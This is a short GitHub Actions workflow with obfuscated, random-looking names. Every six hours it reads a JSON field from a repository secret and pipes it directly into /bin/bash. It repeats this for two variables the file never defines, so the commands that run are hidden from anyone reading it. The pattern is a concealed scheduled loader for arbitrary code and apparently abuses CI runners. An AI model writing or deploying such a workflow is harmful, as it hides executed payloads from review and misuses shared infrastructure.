name: gukaiqu6218
on:
  workflow_dispatch:
  schedule:
    - cron: '48 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gukaiqu6218
        env:
          yr7: ${{ secrets.yr7 }}
        run: |
          echo $yr7 | jq -r .tn85 | /bin/bash
          echo $j440 | jq -r .r40 | /bin/bash
          echo $mbo217 | jq -r .qvo89582 | /bin/bash

